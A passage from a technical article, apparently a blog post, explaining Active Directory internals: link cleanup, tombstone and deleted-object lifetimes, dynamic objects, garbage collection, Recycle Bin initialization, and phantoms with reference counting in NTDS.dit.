Every 12 hours
When an object has been marked for cleaning and the original transaction has been committed
The task runs for maximum of 5 minutes until it reschedule itself:
If there is more work to do: immediately rescheduled.
If trigged by cleaning don’t reschedule
If the re occurring task, reschedule within 12 hours (e.g. not trigged by ‘doLinkCleanUp’)
The following events will eventually trigger the link cleaner or the delayed link processing mechanism:
Table 8: Events that trigger background processing of linked values
Mechanism
Event
Recycle Bin State
Action
Link Cleaner Delayed Link Processing
More than 1000/10000 links removed when an object is logically deleted
Off
Links are physically removed
Link Cleaner Delayed Link Processing
More than 1000/10000 links removed when an object is physically deleted
(Note: The object remains represented as a none-object also known as a phantom and the row in the database remains until all links has been deleted)
N/A
Links are physically removed
Link Cleaner Delayed Link Processing
More than 1000/10000 links are touched (making the replicator replicate them out – as when a none-universal group changes into an universal group)
N/A
Links replicate out to the GCs
Link Cleaner Delayed Link Processing
More than 1000/10000 links are removed as a results of an universal group being changed to a none-universal group
N/A
Links disappear from the GCs
Delayed Link Processing
More than 10000 links are removed when an object is logically deleted
On
Links are deactivated
Delayed Link Processing
An object with more than 10000 links transforms from being logically deleted into being recycled.
On
Links are physically removed
Delayed Link Processing
An object with more than 10000 links are being undeleted
On
Links are activated
In Windows Server 2008 R2 and later, the amount of links that are processed in a single transaction can be configured by a registry parameter: “Links process batch size”.
‘Links process batch size’ DWORD registry values can be configured within the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\<INSTANCE>\Parameters. Note: a value of 0 can’t be used – and I strongly don’t recommend anyone to change the default behavior.
The Delayed Link Processing or the Link Cleaner process can be initiated manually by triggering the operational attribute: “doLinkCleanUp”: http://msdn.microsoft.com/en-us/library/cc223304(v=prot.10) on Windows Server 2003 DSAs or later.
The link cleaner and the delayed link processing mechanism implements the following at the database level (NTDS.dit)
Table 9: datatable – Simplified for the link cleaner and the delayed link processing mechanism
Used by the delayed link processing mechanism to identify rows that needs work performed.
Note: Only present in Windows Server 2008 R2 databases and later
The following Performance Monitors are available to track Delayed Link Processing:
Table 11: Delayed Link Processing Performance Counters
Category
Name
Operating System
Description
NTDS
Link Values Cleaned/sec
Windows Server 2008 or later
The rate at which link values that need to be cleaned are cleaned.
Tombstones and tombstone lifetime The object remains in this state (referred to as tombstones) for the period of tombstone lifetime (TSL) that is by default either 60 or 180 days depending on the operating system and service pack level of the first domain controller introduced in the Active Directory forest:
Table 12: tombstoneLifetime (TSL) defaults
Days
Operating System
60
Windows 2000 Server (All versions) Windows Server 2003 RTM Windows Server 2003 R2
180
Windows Server 2003 Service Pack 1 or later Windows Server 2008 Windows Server 2008 R2 Windows Server 2012
The defaults are more specifically defined in the [Directory Service] section of the schema.ini file that is used during the DCPROMO process; table 2 gives you an extract of the schema.ini file:
Table 13: Schema.ini (TSL) defaults
Schema.ini
;——————————————————–
; Windows NT subtree under the Services subtree
;——————————————————–
[Windows NT]
objectClass=Container
ObjectCategory=Container
ShowInAdvancedViewOnly=True
CHILD=Directory Service
[Directory Service]
objectClass=nTDSService
ObjectCategory=NTDS-Service
ShowInAdvancedViewOnly=True
; Explict TSL default set in W2K3 SP1 to increase shelf-life of backups and allow longer
; disconnection times.
tombstoneLifetime=180
The tombstone lifetime (TSL) is defined in days by the “tombstoneLifetime” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object. However if the attribute doesn’t contain a value e.g. is NULL – tombstone lifetime (TSL) is always 60 days regardless of ‘Table 1.’
If a value of less than 2 days is specified, the tombstone lifetime (TSL) defaults to 60 days, except for Windows Server 2008 R2 and Windows Server 2012, where the tombstone lifetime defaults to 2 days, finally the tombstone lifetime (TSL) can as mentioned in ‘Table 2.’ above be defined in “schema.ini” before the first domain controller is promoted in the forest.
The tombstones remain for as long as the tombstone lifetime (TSL) and are then deleted from the database (this is referred to as physical deletion and happens locally on each DSA by the Garbage Collector), eventually the object (row) remains represented as a phantom that exists in the database to satisfy reference integrity (e.g. other rows in the database that references the row being deleted).
Deleted objects lifetime and deleted objects
The deleted objects lifetime also known as the DOL and was introduced with Windows Server 2008 R2 to support the Recycle Bin feature where it becomes possible to un-delete an already deleted object to its original state, the deleted objects lifetime (DOL) determines the timeframe in days (by default the same as tombstone lifetime), for how long a deleted object is left in a deleted state so that it can be fully restored (un-deleted). Once the object has passed the DOL it’s transformed into a recycled object that reminds of a tombstone and is processed very likely a tombstone. The deleted objects lifetime is defined in days by the “msDS-DeletedObjectLifetime” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object. However if the attribute doesn’t contain a value e.g. is NULL – the deleted objects lifetime is equal to the tombstone lifetime mentioned above. However the deleted objects lifetime can never be shorter than 2 days.
The deleted objects remain for as long as the deleted object lifetime (DOL) and are then translated into a recycled object, where most information on the object is stripped away.
Dynamic Objects
Dynamic objects were introduced with Windows Server 2003 (by introducing the ability to dynamically linking auxiliary classes to instantiated objects). More specifically the “dynamicObject” auxiliary class that can be added to an object during creation/instantiation of an object and/or added as an objectClass later on to an already existing/instantiated object.
Dynamic objects are objects that are automatically deleted after a period of time. When they are deleted (automatically or manually), they do not transform into any other state, such as a tombstone, deleted-object, or recycled-object (However they may transform into a none-object also known as a phantom to satisfy reference integrity). They are distinguished from regular objects by the presence of the dynamicObject auxiliary class among their objectClass values. The intended time of deletion is specified (in seconds) by the Entry-TTL attribute.
The following requirement applies to Dynamic Objects:
Most be hosted by a Windows Server 2003 DSA or later
Can only be instantiated in a domain naming context (Domain NC) if the forest functional level (FFL) is Windows Server 2003 or later Note: This is cause a down-level DSA (earlier than Windows Server 2003) wouldn’t know what dynamic objects are, and wouldn’t delete them). One can first think that a requirement of domain functional level (DFL) would have been more suitable. However the object still has the possibility to be spread to down-level DSAs in other domains thought Global Catalogs (GCs).
Can always be instantiated in none-domain naming contexts (NDNCs) – because NDNCs can’t by design ever be fully hosted by a down-level DSA (earlier than Windows Server 2003) nor are they Global Catalog (GC) replicated. (I’ve done several attempts to trick an NDNC into being GC replicated without success)
Can never be instantiated in/added to an object at:
The Schema naming context (NC)
The Configuration naming context (NC)
An object that has the FLAG_DISALLOW_DELETE bit present in their systemFlags attribute:
All if any descendant objects, they must be dynamic objects as well.
Must be physically deleted by the DSA when all of the following conditions are meet:
The current time is greater than or equal to its msDS-Entry-Time-To-Die.
There are no descendant objects.
In theory there should never be, any descendant objects will have their msDS-Entry-Time-To-Die adjusted by the garbage collector so that they are removed before its parent.
There is no simple (none-linked) references to the object (there is no other object referencing the dynamic object)
If there are simple (none-linked) references to the object, the object (row) remains represented as a none-object also known as a phantom.
The object is not a critical system object (e.g. NOT having the Is-Critical-System-Object or is-Critical-Object set to: True)
Entry-TTL requirements: The Entry-TTL attribute specifies (in seconds) the intended time-to-live (TTL) for the dynamic (once the time has elapsed the object is being processed for physical deletion by the DSA) and have the following requirements:
The minimum Entry-TTL that can be configured/set for any dynamic object is the configurable value ‘DynamicObjectMinTTL’ value that’s by default are 900 seconds (15 minutes). However the ‘DynamicObjectMinTTL’ default value is configurable and can be changed by modifying the ‘DynamicObjectMinTTL=<seconds>’ value of the “msDS-Other-Settings” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object (The minimum value is 1 and the maximum value is 31557600 (one year).If the ‘DynamicObjectMinTTL’ value isn’t present in the “msDS-Other-Settings” attribute, the default is 900 seconds (15 minutes).
The maximum Entry-TTL that can be configured/set for any dynamic object are by default defined by the upper-Range attribute of the Entry-TTL schema object. The default maximum value is 31557600 seconds (one year). Note: The upper-Range attribute can’t be modified on a constructed attribute, it is possible to change this default value but it’s not recommended and requires a lot of knowledge.
The Entry-TTL can be set during the instantiation/creation of a dynamic object as long as the value is between (1.) and (2.) above. However if there is no Entry-TTL attribute specified during the creation of a dynamic object, The DSA will set an default configurable value ‘DynamicObjectDefaultTTL’ value that’s by default are 86400 (one day).However the ‘DynamicObjectDefaultTTL’ default value is configurable and can be changed by modifying the ‘DynamicObjectDefaultTTL =<seconds>’ value of the “msDS-Other-Settings” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object (The minimum value is 1 and the maximum value is 31557600 (one year).
How Dynamic Objects are maintained by the DSA
Dynamic objects are maintained by the DSA (evaluated for deletion once their TTL is expiring) by two different tasks:
By its own scheduled task that is initiated and starts 15 minutes after startup – the task then process dynamic objects in the following manner:
Process dynamic objects that match: current time => msDS-Time-To-Die value until all dynamic objects in the range has been processed or > 5000 objects has been processed (ESE version store limit) or abort if a shutdown has been initiated.
If the object found wasn’t able to be deleted because any of the following reasons skip to next candidate:
The object is marked critical. (e.g. the isCriticalSystemObject is set to: TRUE)
The object has backlinks pointing towards it and those can’t be removed.
The object still have descendant / child objects.
The object has simple references pointing towards it and was there for converted into a none-object also known as a phantom instead.
If (.a) complete the task with the following status:
There was more than 5000 object to process (more object’s than can be modified in a single ESE DB transaction to the NTDS.dit with respect to the ESE version store): Action: The task is re-scheduled immediately.
If the last object that was evaluated in (a.) and hadn’t reached its expiring time yet, and was about to expire in less than the default configurable ‘Delete expired entryTTL (secs)’ value that’s by default are 900 (15 minutes) then the task is re-scheduled within the default configurable ‘Delete next expired entryTTL (secs)’ value that’s by default are 30 (30 seconds) + the seconds until that object is expiring.
The ‘Delete next expired entryTTL (secs)’ and the ‘Delete next expired entryTTL (secs)’ DWORD registry values can be configured within the following key:
Note: if those registry values aren’t present the defaults mentioned above will take place, the value can’t be 0 (zero) and the updated values aren’t affected until next reboot.
If (i.) or (ii.) didn’t occur then the task would be re-scheduled to run within the default configurable ‘Delete expired entryTTL (secs)’ value that’s by default are 900 (15 minutes) again.
By the garbage collector (Please see the next section: The Garbage collector process)
The Garbage collector process
The Garbage collector process runs by default every 12 hours and 15 minutes after startup independently on each DSA, the garbage collection interval is defined in hours by the: “garbageCollPeriod” attribute on the “CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=X” object. (Minimum is one hour and maximum is one week) However if the attribute doesn’t contain a value e.g. is NULL – Then the garbage collection period is always the default 12 hours.
The Garbage Collector is responsible for the following subtasks:
Manage logically deleted objects and phantoms:
Phantoms that is older than the TSL/DOL:
Physically delete: reference countless phantoms that doesn’t appear on the ‘recycle_time_index’ (e.g. has a ‘time_col’ value that has passed TSL/DOL.)
Modify: phantoms with (that has) reference counts and set their ‘time_col’ to the current date, which have expired and doesn’t appear on the ‘recycle_time_index’ (e.g. had a ‘time_col’ value that had passed TSL/DOL.) – So that they won’t be looked at again for another TSL/DOL.
Deleted Objects that is older than the TLS/DOL:
Physically delete: All Deleted Objects if the schema doesn’t have the ‘IsRecycled’ attribute *Only happens on a Windows Server 2008 R2 DSA or later Note: Can happen in AD LDS
Physically delete: All Deleted Objects in none-writable naming contexts (NCs) if the recycle bin is in the off state
Recycle: Deleted Objects in writable naming contexts (NCs)*Only happens on a Windows Server 2008 R2 DSA or later and schema has ‘isRecycled’
Physically delete: All boot-strap objects from the distribution database (NTDS.dit)
Recycled-Objects that is older than the TSL:
Physically delete: All Recycled-Objects regardless of naming context (NC) or state of the recycle bin.
Recycled-Phantoms that is older than the TSL:
Physically delete: All Phantoms that are reference countless and appear on the ‘recycle_time_index’ (e.g. has a ‘recycle_time_col’ value that has passed TSL).
Modify: phantoms with (that has) reference counts and set their ‘recycle_time_col’ to the current date, which have expired and appears on the ‘recycle_time_index’ (e.g. had a ‘recycle_time_col’ value that had passed TSL.) – So that they won’t be looked at again for another TSL.
Deleted Linked-Values that is older than the TSL:
Physically delete: All linked-value replication (LVR) values that are ABSENT and older than the TSL.
Dynamic objects that is older than their ‘msDS-Time-To-Die’:
Physically delete: All dynamic objects that has expired (older than their time to live). Note: (For detailed processing, please see the section above: How Dynamic Objects are maintained by the DSA)
Note: Pre-Windows Server 2008 R2 DSAs (a.) and (b.) above applies to TSL rather than DOL.
Note: Pre-Windows Server 2008 R2 DSAs doesn’t process step (c.) and (d.) above.
Note: Pre-Windows Server 2003 DSAs doesn’t process step (e.) and (f.) above.
The following is logged once the garbage collection processes successfully removes a tombstone or recycled object (the object is most likely really demoted to a phantom):
Table 15: Garbage Collection Removal Event
Event ID
Source
Category
Description
1132
ActiveDirectory_DomainService
Garbage Collection
Internal event: The Directory Service removed the expired, deleted object <Object> from the database.
2918
ActiveDirectory_DomainService
Garbage Collection
Internal event: The Directory Service recycled the expired, deleted object <Object> from the database.
Perform online defragmentation of the Active Directory database NTDS.dit – if and only if the following DSA Heuristics flag has not been set: DecoupleDefragFromGarbageCollection (0000000001) and the DSA didn’t processed more than 5000 objects or values according to the table below: http://support.microsoft.com/kb/871003
The following event is logged once the online defragmentation has completed:
Table 16: Online Defragmentation Completed Event
Event ID
Source
Category
Description
1646
ActiveDirectory_DomainService
Garbage Collection
Internal event: The Active Directory Domain Services database has the following amount of free hard disk space remaining.
The Garbage Collection process is rescheduled more aggressively than the garbage collection period if there was more than 5000 objects/phantoms and/or values examined:
The task is rescheduled to 1/2 of the garbage collection period.
There was more than 5000 expired tombstones in the pass
Windows 2000 Server (All versions)
The task is rescheduled immediately.
There was more than 5000 expired tombstones, expired absent link values and expired dynamic objects (combined) in the pass
Windows Server 2003 (All versions)
Windows Server 2008 (All versions)
The task is rescheduled immediately.
There was more than 5000 expired deleted objects/phantoms, expired recycled objects/phantoms, expired absent link values and expired dynamic objects (combined) in the pass
Windows Server 2008 R2
Windows Server 2012
The following indices are implemented at the database layer to support the garbage collection tasked described above:
Table 18: datatable – Indices required to support the Garbage Collection Process
Used by the garbage collector to find expired deleted objects and phantoms that doesn’t have a ‘recycle_time_col’ value and either evaluates them for physical deletion or recycles them.
Note: Only present in Windows Server 2008 R2 and later database.
Used by the garbage collector to find expired ABSENT deleted link values and physically delete them.
Note: Only present in Windows Server 2003 databases or later.
The following Performance Monitors are available to track Garbage Collection activity:
Table 19: Garbage Collection Performance Counters
Category
Name
Operating System
Description
NTDS
Tombstones Visited/sec
Windows Server 2008 or later
The rate at which tombstoned objects are visited to be considered for garbage collected.
NTDS
Tombstones Garbage Collected/sec
Windows Server 2008 or later
The rate at which expired tombstoned objects are garbage collected.
The following event will be logged once the Garbage Collector task has completed:
Table 20: Garbage Collection Completed Event
Event ID
Source
Category
Description
1006
ActiveDirectory_DomainService
Garbage Collection
Internal event: Finished removing deleted objects that have expired (garbage collection). Number of expired deleted objects that have been removed: <Number of removed objects>.
Initialization of the Recycle-Bin in the off mode – Introduction of a Windows Server 2008 R2 DSA or later
So turning the Recycle-Bin off is impossible right? We’ll all writable Windows Server 2008 R2 and later DSAs actually will do so on every startup, but not in the way you’re thinking. However they are sort of preparing for someone to eventually turning the feature on in the future (this task can simply be referred to as a cleanup).
This is accomplished by scanning the ‘deltime_not_recycled_index’ for tombstones (excluding phantoms) (e.g. logically deleted objects with ‘isDeleted’ set to ‘1 (True)’) in all writable naming contexts (NCs) present on each writable Windows Server 2008 R2 DSA or later (regardless of functional level) and recycles them, e.g. setting ‘isRecycled’ to ‘1 (True)’ and their ‘recycle_time_col’ so that they instead appear on the ‘recycletime_index‘ and disappears from the ‘deltime_not_recycled_index’ there is however two conditions:
The ‘isRecycled’ attribute must be present in the schema
The Recycle-Bin must be off (However it must have been off at some time, the exception here is DSA being built from a Install From Media (IFM) database (NTDS.DIT))
This is required because the garbage collector in Windows Server 2008 R2 or later works with the ‘recycletime_index’ for physically deleting tombstones and recycled objects in writable naming contexts, this is an optimization so that once the Recycle-Bin is enabled; there is no need to simultaneously on all DSAs trying to convert all current tombstones into recycled objects.
The initialization process will process tombstones in batches of 5000 until it re-schedule itself again (as the regular garbage collection process, please see ‘The Garbage collector process’ above) until it has finished processing all tombstones and log the following event for every time it reschedules:
Table 21: Windows Server 2008 R2 DSA still processing initialization of the Recycle-Bin in the off-mode
Event ID
Source
Category
Description
2138
ActiveDirectory_DomainService
Garbage Collection
Internal processing of the Active Directory Domain Services database has not yet completely updated the AD_TERM’s tracking of the state of deleted objects. Until this processing completes successfully, objects may not be undeleted. Additionally, the Recycle Bin feature may not be enabled. This processing is continuing.
Once it has completed processing all tombstones the following event will be logged:
Table 21: Windows Server 2008 R2 DSA has completed processing initialization of the Recycle-Bin in the off-mode
Event ID
Source
Category
Description
2139
ActiveDirectory_DomainService
Garbage Collection
Internal processing of the Active Directory Domain Services database has completed the update of the Active Directory Domain Services’s tracking of the state of deleted objects.
This also comes with one disadvantage initially – Temporary Lingering Objects:
Recycle an object (in this case a tombstone) e.g. setting ‘isRecycled’ to ‘1 (True)’ is a replicating event – causing the change to replicate out to other DSAs that host/or has hosted the object in the past (as it is a tombstone) it could already have been physically deleted on some DSAs depending on if/when those DSAs where restarted and when the latest scheduled garbage collection process took place. In the case where the object has already been physically deleted, and an update to the object is being replicated to a now nonexistent object on this DSA (The DRA – Replicator on this DSA is going to treat this as an ‘Add’ for a new object until it realize it’s missing required attributes for an ‘add’ of a new object) – the DSA is going to indicate lingering objects by logging the following event:
Table 21: Lingering Object caused by introduction of a writable Windows Server 2008 R2 or later DSA
Event ID
Source
Category
Description
1388
ActiveDirectory_DomainService
Replication
Active Directory Domain Services Replication encountered the existence of objects in the following partition that have been deleted from the local domain controllers (DCs) Active Directory Domain Services database. Not all direct or transitive replication partners replicated in the deletion before the tombstone lifetime number of days passed. Objects that have been deleted and garbage collected from an Active Directory Domain Services partition but still exist in the writable partitions of other DCs in the same domain, or read-only partitions of global catalog servers in other domains in the forest are known as “lingering objects”.
4bbfc010-4bec-4c3f-b3e8-1dcab9d3238d This event is being logged because the source DC contains a lingering object which does not exist on the local DCs Active Directory Domain Services database. This replication attempt has been blocked.
The situation is going to resolve itself within a garbage collection interval that is default 12 hours (e.g. all DSAs will have garbage collected the object/Physically deleted the object from the database) – however the issue can be remediated by doing one of the following:
Increase the garbage collection interval prior to the introduction of the first writable Windows Server 2008 R2 DSA or later.
Once this has been performed on a Windows Server 2008 R2 DSA or later for the first time in all writable naming contexts in your forest, it’s unlikely that the initialization of Recycle-Bin in the off mode are going to find any tombstones to convert into recycled objects in the future (although this is checked on every startup), because from now on a logical deletion (while the Recycle-Bin is still off) will have both the ‘isRecycled’ and the ‘isDeleted’ attribute set by the writable Windows Server 2008 R2 and later DSAs.
Phantoms and reference integrity
So what is reference integrity in Active Directory? References in Active Directory are one object pointing to another object (Or one row that references another row in the database) by an attribute that has one of the following syntaxes:
Object(DS-DN)
Object(DN-String)
Object(DN-Binary)
Object(Access-Point)
Object(OR-Name)
The requirement that comes with references is that an object (row in the database) that has other objects (rows in the database) pointing towards it (referencing it) – Can’t be physically removed unless all references are removed first.
Let’s create two objects, where one of the objects references the other object by the attribute ‘seeAlso’:
dn: cn=Christoffer Andersson,cn=ESEDEV,DC=ADAM,DC=chrisse,DC=com changetype: add objectClass: user
dn: cn=Jimmy Andersson,cn=ESEDEV,DC=ADAM,DC=chrisse,DC=com changetype: add objectClass: user seeAlso: cn=Christoffer Andersson,cn=ESEDEV,DC=ADAM,DC=chrisse,DC=com
Let’s now logically delete the first created object “CN=Christoffer Andersson” (that the other object “CN=Jimmy Andersson” references) and wait until the object is up for physical deletion (e.g. the tombstone life time has passed since the object was logically deleted) – “CN=Christoffer Andersson” is now about to be physically deleted from the database, but it’s NOT (To satisfy the requirement mentioned above and not leaving the object “CN=Jimmy Andersson” pointing to a none-existing object in its ‘seeAlso’ attribute) instead “CN=Christoffer Andersson” remains represented as a none-object also known as phantom to satisfy the reference integrity and will remain in the database for as long as the reference exists.
Linked vs. none-linked references:
Simple references – This is none linked attributes as the example described above with the ‘seeAlso’ attribute – those are not removed on the source object (e.g. the object being referenced) and remains until one of the following happens:
The object that references the object is being deleted (e.g. in the example described above – The object “CN=Jimmy Andersson” is deleted, this potently frees the last reference to “CN=Christoffer Andersson” as the attribute ‘seeAlso’ is also being deleted as a part of deleting the object.
The reference itself is being removed (e.g. in the example described above – The attribute value of ‘seeAlso’ is removed on the object “CN=Jimmy Andersson” this potently frees the last reference to “CN=Christoffer Andersson”)
Linked references – This is a linked attribute, usually those references are removed during logical deletion (e.g. during transformation into a tombstone or recycled object) – However backlinks are kept during a read-only naming context (NC) tear down.
Demotion from an object to a none-object (phantom):
An object can be converted (demoted) from a real object into a none-object also known has a phantom by two different reasons.
The object (e.g. a tombstone or recycled object) has expired (e.g. passed the tombstone lifetime or the deleted object lifetime).
In addition to the attributes listed in (a.) any attribute keeping the object (the database row) on the index being garbage collected will preserved (e.g. msDS-Entry-Time-To-Die) – otherwise the object or phantom wouldn’t be up for examination next time the garbage collector process is running.
If there is NO references pointing towards the phantom after performing (a.) then the phantom (the row in the database) is up for being physically deleted – and be will completely removed from the database at the next Garbage Collector cycle (that’s by default runs every 12 hours). However if there ARE still references pointing towards the object – it’s going to remain as a none-object also known as a phantom until all references pointing towards it have been removed.
The object is leaving a DSA as a result of a read-only naming context (NC) tear down – but still has references pointing towards it. in this case the following happens:
In addition to linked and none-linked attributes there are two other references:
If an object has descendant (child) objects and/or phantoms it has one reference pointing towards it for each and every direct descendant (child) object or phantom.
All objects (not phantoms) holds a reference to them self’s by the Obj-Dist-Name attribute (http://msdn.microsoft.com/en-us/library/ms675516(v=VS.85).aspx).
References and Reference Counting within NTDS.dit
An object (row) in the database is represented locally and independently (on each DSA) within each database as a DNT – DNT is a short for distinguished name tag. (You need to be familiar with the concept of DNTs in order to understand reference integrity at the database layer in NTDS.dit – I’ve already given an introduction to DNTs in: How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 2
Table 22: datatable – Simplified for reference integrity
The CNT_col is the column that keeps track of how many references that point to the actual row by other rows in the database.
That might be:
One count for each DN-syntax attribute that holds the value of the object (linked, none-linked, deleted, tombstone and recycled).
One count for each direct descendant (child) objects underneath the object.
Once count if the delayed linked processing mechanism or the link cleaner is working with links on the object.
Simple references in NTDS.dit
Let’s add in a sample NTDS.dit database with a simple reference:
“Elina Andersson” has a reference count “CNT_col” of “2” because of:
“Elina Andersson”‘s own self-reference from the “Obj-Dist-Name” attribute.
“Lena Andersson” is referencing “Elina Andersson” by the “seeAlso” attribute.
Let’s logically delete “Elina Andersson” and have a look what happens in the database:
Note: X represent when the object was logically deleted ex: 2012-09-09 09:09:09
The only remarkable change to the reference in this state would be that it is represented outside the database as a delete managed RDN in the value of the “seeAlso” attribute at “Lena Andersson” ex: CN=Elina Andersson\0ADEL:1e5f5da7-af10-4d69-9c06-491c79659116
Let’s pretend that 60/180 days (or the time of tombstone lifetime has elapsed) since X = 2012-09-09 09:09:09 when “Elina Andersson” was logically deleted and have a look at the database again:
The garbage collector would have tried to physically delete “Elina Andersson” now but failed because the reference count “CNT_col” isn’t still yet zero cause “Elina Andersson” is still being referenced by “Lena Andersson”‘s “seeAlso” attribute – instead the object was converted into a none-object also known as phantom – as a result of this note the following:
“Elina Andersson” lost the attribute “Obj-Dist-Name” (that referenced “Elina Andersson” self) while it was converted to a none-object (phantom) and therefore dropped its reference count “CNT_col” from 2 to 1.
“Elina Andersson”‘s “OBJ_col” was changed from 1 to ‘NULL’ to indicate that the row in the database now represents a none-object (phantom) instead of an object.
Let’s pretend that a few weeks later “Lena Andersson” is logically deleted and have a look at the database again:
Note: Once “Lena Andersson” was being logically deleted and transformed into a tombstone or recycled object, “Lena Andersson” lost the attribute value of the “seeAlso” attribute as it’s not preserved on logical deletion by default: See Attributes preserved on logical deletion for more information.
This means that “Elina Andersson” now is free to be deleted (No more references to DNT:5524) – as “Lena Andersson” held the last reference towards “Elina Andersson” in the database, “Elina Andersson”‘s reference count “CNT_col” is now 0 , “Elina Andersson” will be deleted immediately when the garbage collector runs next time.
Linked references in NTDS.dit
Let’s add in a sample NTDS.dit database with a linked reference:
“Elina Andersson” is a member of “Group X” (the hosting object) -as the member attribute is the forward link – referencing “Elina Andersson”. The reference count “CNT_col” is increased with +1 on “Elina Andersson”.
Note: There is no reference count from the backlink towards the forward link – No dangling backlink reference is possible since if the host DN is removed it must have first been logically deleted, which implicitly removes all link attributes and their associated targets’ backlinks.
Logically deleting either “Group X” or “Elina Andersson” would decrease the reference count “CNT_col” with -1 and remove the corresponding row above in the ‘link_table’ as well removing the value “Elina Andersson” from the member attribute at “Group X”.
Cross Naming Context (NC) references
A reference can be made between two objects that reside in different naming contexts (this is regardless if the reference is simple or linked) with the following restrictions:
Objects in none domain naming contexts (NDNCs) – can have the following references:
To any object within the configuration naming context (NC).
To any object within the schema naming context (NC).
The naming context head of any none domain naming context (NDNC).
Any object within their own domain naming context (NDC)
All other references than a, b, c and d is disallowed.
Objects in a domain naming context, schema naming context, configuration naming context – can have the following references:
To any objects within any other domain naming context (NC) within the forest.
To any object within the schema naming context (NC).
To any object within the configuration (NC).
To any none domain naming context (NDNC) head.
All other references than a, b, c and d is disallowed except values of non-replicated linked attributes, that can reference any object/row present in the local database (NTDS.dit) at a given DSA.
Let’s have a look at Cross Naming Context (NC) references in NTDS.dit
First we have to explain one new column and an attribute that plays a major role in cross naming context (NC) references.
The ‘instanceType’ attribute determine if the object is writable, and or is a naming context (NC) head itself and if there is any other naming contexts above it using the following bits:
0x00000001 – The head of naming context.
0x00000002 – This replica is not instantiated.
0x00000004 – The object is writable on this directory .
0x00000008 – The naming context above this one on this directory is held.
0x00000010 – The naming context is in the process of being constructed for the first time by using replication.
0x00000020 – The naming context is in the process of being removed from the local DSA.
Let’s add in a sample NTDS.dit database with cross naming context (NC) references from a DSA that’s a GC.
Note: “Elina Andersson” has an instanceType of 0 – that means “Elina Andersson” is a read-only object at this DSA and is part of a read-only naming context, typically that is a global catalog (GC) that hosts the domain naming context (NC) that “Elina Andersson” resides in and some other DSA hosts a writable copy of “Elina Andersson”.
“Lena Andersson” however has an instanceType of 4 – that means “Lena Andersson” is writable on this DSA and is part of a naming context that is authoritatively held on this DSA, typically that is the domain naming context.
The only difference here from other scenarios already mentioned is that if “Elina Andersson” would be logically deleted – it happens (originates) on a DSA that hosts a writable copy of “Elina Andersson”
Let’s have a look at Cross database references (that implicates cross naming context (NC) references) in NTDS.dit
Cross database references are between two objects where one of the object is located in an uninstantiated naming context (NC) e.g. a naming context (NC) not held by the DSA (that’s typically not a global catalog (GC)).
Let’s consider the following scenario – a forest with two domains D1 and D2 where D1 has at least one DC that is NOT a GC e.g. D1-DC01 and D2 has at least one DC that also is a GC e.g. D2-GC1.
Let’s imagine that D1 host the following user object “CN=Gustav Morath,CN=Users,DC=D1,DC=x” that references “CN=Robin Granberg,CN=Users,DC=D2,DC=x” in the ‘seeAlso’ attribute – this relationship causes an issue on D1-DC1: Because D1-DC1 doesn’t host the object being referenced “CN=Robin Granberg,CN=Users,DC=D2,DC=x” cause the D1-DC1 doesn’t hold a copy of the naming context (NC) for the domain D2 as it’s not a global catalog (GC).
Let’s now first look at the database (NTDS.dit) on D2-GC1:
Let’s now look into the database (NTDS.dit) on D1-DC1:
This problem is solved by representing “Robin Granberg” as a none-object also known as phantom to satisfy reference integrity, during the update of the object “Gustav Morath” the distinguishedName (DN) of “Robin Granberg” is requested to be added to the ‘See-Also’ attribute, during this request a few things are validated.
Verify that the distinguishedName we’re about the reference really exist:
If the distinguishedName entered matches an existing local object within the local database (NTDS.dit): In this case it dosen’t as we don’t host the object “Robin Granberg” as the object resides in another uninstansiated naming context D2.
If the distinguishedName entered matches any object within the enterprise, this is verified by going off the local machine, in this case D1-DC01 and perform the lookup on a DC that also is a Global Catalog Server (GC) as those host all refrenable objects. If the object exists on the queried GC the objects GUID and SID (if those exists) are retrived as well.
Verifying that the reference constraints mentioned above at: Cross Naming Context (NC) references are fullfiled.
If 1b and 2 above are fullfiled, then a phantom for the object being refrenced are created in the local database (NTDS.dit) in this case at D1-DC01 representing the object “Robin Granberg” including any structal phantoms needed to represent the full (DN) of “Robin Granberg”:
Here is a sample on how the represenation of the object “Robin Granberg” as a phantom and needed structual phantoms would look at D1-DC01:
How cross-database references are maintained to not become “stale” (outdated) in NTDS.dit
We have now gone thru how reference phantoms and eventually needed structural phantoms are created on none-GCs (Global Catalog Servers) to satisfy reference integrity – the initial creation of those phantoms are done by the local DSA once a reference is being written and isn’t found within the local database on the given DSA – it performs a “enterprise/forest wide verification” by locating a Global Catalog using the ‘DsGetDCName‘ (DCLocator) API with the flag ‘DS_GC_SERVER_REQUIRED’ to find a suitable GC (Global Catalog Server) to verify names against using the RPC interface method ‘IDL_DRSVerifyNames‘ with the flag ‘DRS_VERIFY_DSNAMES’
Let’s now imagine that the object “Robin Granberg” undergoes one of the following changes:
Being logically deleted (The case we’re focusing on in this article)
Having its RDN (Relative Distinguished Name) changed. (The object is renamed)
Being moved (changes parent) so that the DN (Distinguished Name) is being changed.
Had its SID changed.
If one of the cases mentioned above takes place to “Robin Granberg” on D2-GC1 (or another DC that is authoritative/holds a writable copy of the object) the phantom used to represent the reference to “Robin Granberg” from “Gustav Morath”‘s ‘See-Also’ attribute will become outdated (stale) on D1-DC1.
The scenarios described above enter the requirement for the flexible single master operations (FSMO) role ‘Infrastructure Master’ or the “IM” that according to me originally had a better name, the ‘Phantom Master’. The IM (Infrastructure Master) is responsible to maintain phantoms within a given domain and make sure that they don’t become outdated (stale) while the “real” object they represent changes as described above in other domains, the IM (infrastructure Master) is also responsible for spreading the word of any outdated (stale) phantoms and their new state to other DCs that are none GCs (Global Catalog Servers) in their domain except when the Recycle-Bin is on and all DCs that are none GCs (Global Catalog Servers) are responsible on their owns for this task.
The Infrastructure Master (IM) process with the Recycle-Bin Off
So let’s have a look on how the IM (infrastructure Master) will update a phantom in the case if the “real” object is being logically deleted in its own domain, specifically in this case if “Robin Granberg” is being logically deleted in the D2 domain. (For simplifying this scenario we have removed the reference in the ‘see-Also’ attribute from ‘Gustav Morath’ to ‘Robin Granberg’)
